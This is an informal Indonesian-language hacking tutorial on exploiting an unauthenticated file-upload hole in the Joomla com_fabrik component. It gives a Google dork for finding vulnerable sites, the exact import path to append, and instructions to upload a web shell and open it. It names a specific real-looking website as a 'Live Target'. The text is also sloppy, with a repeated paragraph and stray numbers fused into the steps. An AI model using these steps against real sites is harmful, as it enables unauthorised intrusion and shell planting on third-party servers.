Oh ya, disini saya jelaskan sedikit ya tentang exploit. Saya sih belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat diartikan sebagai sebuah kode yang menyerang keamanan
Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.
1. Copas dork ini ke google [dork bisa dikembangkan]
Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.
1. Copas dork ini ke google [dork bisa dikembangkan]
12 inurl:index.php?option=com_fabrik2. Ceritanya kita sudah mendapat si target
12 http://ar.librodar.com.ar/index.php?option=com_fabrik3. Maka pastekan Vulnerable path nya di belakang Url, Vulnerable path nya adalah ini :
12 index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=14. Maka akan jadi seperti ini
12 http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=15. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe
12 php,asp,html,jpg6. Sudah ? nah sekarang kita akses shellnya di
12 http://localhost.com/media/shell.php
Kalo tipe .php gabisa ya terpaksa dengan tamper data :D
Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan